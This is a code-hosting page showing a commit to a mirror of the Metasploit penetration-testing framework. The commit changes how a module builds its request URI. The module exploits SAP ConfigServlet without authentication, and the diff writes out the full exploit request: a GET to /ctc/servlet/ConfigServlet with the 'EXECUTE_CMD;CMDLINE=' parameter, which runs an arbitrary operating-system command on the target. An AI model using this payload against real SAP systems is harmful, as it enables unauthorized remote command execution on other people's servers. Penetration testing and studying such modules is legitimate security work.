infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

improve URI path and parameter handling 

switch from PATH to TARGETURI datastore;
use normalize_uri to build uri;
use query in send_request_cgi to to prepare query string (instead of
vars_get that escapes the necessary semicolons)
unstable
Andras Kabai 2013-04-19 21:37:39 +02:00
parent c52588f579
commit 85932a2445
1 changed files with 6 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb
View File

@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
[
Opt::RPORT(50000),
OptString.new('CMD', [ true, 'The command to execute', 'whoami']),
OptString.new('PATH', [ true, 'Path to ConfigServlet ', '/ctc/servlet/ConfigServlet']),
OptString.new('TARGETURI', [ true, 'Path to ConfigServlet', '/ctc/servlet']),
OptBool.new('SSL', [true, 'Use SSL', false])
], self.class)
end
@ -36,10 +36,13 @@ class Metasploit3 < Msf::Auxiliary
def run
begin
print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])
uri = normalize_uri(target_uri.path, 'ConfigServlet')
res = send_request_cgi(
{
'uri' => datastore['PATH'] + '?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text.uri_encode(datastore['CMD']),
'method' => 'GET'
'uri' => uri,
'method' => 'GET',
'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text::uri_encode(datastore['CMD'])
})
if !res or res.code != 200
print_error("#{rhost}:#{rport} - Exploit failed.")